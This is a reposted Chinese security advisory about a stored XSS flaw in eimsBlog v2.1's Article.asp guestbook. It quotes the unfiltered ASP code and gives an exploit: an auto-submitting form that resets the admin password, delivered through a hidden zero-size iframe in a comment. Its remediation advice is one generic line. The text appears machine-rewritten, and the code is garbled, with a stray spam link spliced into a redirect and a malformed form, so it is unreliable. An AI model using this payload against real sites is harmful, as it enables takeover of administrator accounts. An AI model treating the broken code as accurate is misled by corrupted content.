当前位置:七道奇文章资讯安全技术网络技术
日期:2010-08-27 00:17:00  来源:本站整理

eimsBlog_v2.1跨站漏洞及修复倡议[网络技术]

赞助商链接



  本文“eimsBlog_v2.1跨站漏洞及修复倡议[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

公布时间:2010-08-23

影响版本:eimsBlog_v2.1

漏洞描写:跨站漏洞

公布作者:m4r10   http://www.bhst.org    转载请注明版权

漏洞解析:Article.asp

------------------------------------------------------------------------------
If Action = "Save" Then
If Session("CheckCode") <> Trim(Request.Form("Code")) Then WriteMsg("考证码错误")
Set Rs=Server.CreateObject("Adodb.RecordSet")
Rs.Open "Select * From [eims_GBook]",Conn,1,3
Rs.AddNew
Rs("TypeID") = ItemID
Rs("Name") = Trim(Request.Form("Name")) '未过滤留言者昵称
Rs("ItemNote") = Replace(Trim(Request.Form("ItemNote")),chr(10),"<br>") '未过滤留言内容
Rs("ItemAddDate") = Now()
Rs.Update
Rs.Close : Set Rs=Nothing
Response.Redirect "Article.asp?Item_blank" href="http://www.110hack.com/" >ItemID
Rs.Close:Set Rs=Nothing   
End If
-------------------------------------------------------------------------------
由于留言评论内容直接插入更新语句,未举行任何过滤,招致XSS跨站漏洞

漏洞操纵:

首先拥有一个自己可控的网站,然后构造表单:

<html>
<form method="post"
action="http://目标URL/admin/UserEdit.asp?Action=Save&Itemname" value="admin">
<input value="123456789">
<input value="123456789">
</form>
<script>
document.form1.submit();
</script>
</html>

将以上代码保存为xxx.asp(文件名随便),并将其上传到自己的可控网站下面,得到你自己的URL地址

在随便一篇的文章评论在留言内容中插入:

<iframe src="http://你自己的URL地址/xss.asp" width=0 height=0></iframe>

漏洞可触发当管理员登陆后台查看留言内容时直接改正管理员密码

危险等级:高

修复倡议:
加强对用户输入内容的查抄与考证,避免恶意者举行攻击


  以上是“eimsBlog_v2.1跨站漏洞及修复倡议[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • eimsBlog_v2.1跨站漏洞及修复倡议
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .